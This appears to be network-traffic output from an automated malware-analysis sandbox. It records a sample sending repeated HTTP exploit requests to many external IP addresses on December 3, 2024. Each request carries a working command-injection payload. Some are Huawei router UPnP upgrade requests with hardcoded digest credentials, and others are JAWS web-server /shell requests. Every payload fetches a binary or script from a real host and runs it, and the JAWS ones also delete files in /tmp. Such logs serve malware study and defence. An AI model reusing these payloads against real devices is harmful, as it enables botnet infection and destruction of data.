                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          55192.168.2.2358794197.57.240.23937215
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:47.684166908 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          56192.168.2.2359074155.203.22.12680
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:47.715289116 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          57192.168.2.2353122170.152.121.16980
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:47.747268915 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          58192.168.2.2358128192.62.46.24080
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:48.044792891 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          59192.168.2.2342638177.95.70.14580
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:48.045500994 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          60192.168.2.2357340186.45.45.22980
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:48.046257019 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          61192.168.2.234811075.96.152.12480
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:48.046911001 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          62192.168.2.233634088.109.144.12180
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:48.047612906 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          63192.168.2.2346408107.254.158.16280
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:48.048310995 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          64192.168.2.2335012116.59.162.8580
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:48.048975945 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          65192.168.2.2358900181.16.202.6780
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:48.049648046 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          66192.168.2.2344924137.96.172.13780
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:48.159888983 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          67192.168.2.2354912158.229.16.17280
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:48.160705090 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          68192.168.2.236064265.196.231.13180
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:48.161453009 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          69192.168.2.236074480.213.14.16580
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:48.162218094 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          70192.168.2.2340216149.214.222.9180
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:48.162961006 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          71192.168.2.234732814.201.184.21880
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:48.163672924 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          72192.168.2.2350374118.211.183.6780
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:48.164346933 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          73192.168.2.2341142105.208.107.22080
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:48.164949894 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          74192.168.2.2348388216.45.248.17280
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:48.165544987 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          75192.168.2.234141884.171.71.6780
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:48.166142941 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          76192.168.2.2336494199.96.168.17980
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:48.167659998 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          77192.168.2.235649241.50.74.6437215
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:48.708165884 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          78192.168.2.2350796156.213.87.16837215
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:48.708811998 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          79192.168.2.2346904134.104.83.7780
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:49.189100027 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          80192.168.2.233754041.76.192.11680
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:49.189881086 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          81192.168.2.2350074112.198.79.12080
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:49.190496922 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          82192.168.2.2344158131.115.153.20180
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:49.191178083 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          83192.168.2.2344118154.175.128.16480
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:49.191777945 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          84192.168.2.233317064.184.219.4180
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:49.192404985 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          85192.168.2.2335992176.69.242.9480
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:49.439774036 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          86192.168.2.2342146138.192.209.11980
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:49.440790892 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          87192.168.2.2348708117.110.109.9980
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:49.441481113 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          88192.168.2.233298274.123.234.3580
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:49.442172050 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          89192.168.2.2335066145.33.190.15780
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:49.442787886 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          90192.168.2.235646632.125.248.3580
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:49.443476915 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          91192.168.2.235311895.58.153.19380
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:49.444086075 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          92192.168.2.235060090.249.44.17580
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:49.444771051 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          93192.168.2.234830049.209.5.24480
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:49.445453882 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          94192.168.2.2352612217.189.104.3480
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:49.446053982 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          95192.168.2.2345074217.19.114.22980
                                                          TimestampBytes transferredDirectionData
